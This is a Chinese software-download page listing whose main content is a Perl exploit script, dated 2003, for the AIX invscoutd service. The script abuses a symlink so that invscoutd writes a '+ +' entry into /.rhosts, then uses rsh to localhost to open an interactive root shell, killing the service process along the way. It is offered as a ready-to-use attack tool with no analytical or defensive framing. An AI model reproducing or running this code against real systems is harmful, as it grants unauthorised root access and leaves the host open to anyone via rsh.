|
|
|
|
|
| 运行环境: Win9x/NT/2000/XP/2003 |
 |
文件大小: 0 K |
| 软件等级: ★★★ |
软件类别: 国产软件 |
| 开 发 商: 未知 |
软件语言: 英文 |
| 相关链接: 软件演示地址 软件注册地址 |
软件属性: 热 |
下载次数: 本日: 本周:
本月: 总计: |
授权方式: 免费版 |
| 解压密码: |
| 软件添加: 审核:admin 录入:admin |
添加时间: 2006-9-24 0:54:15 |
|
 |
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF |
|
|
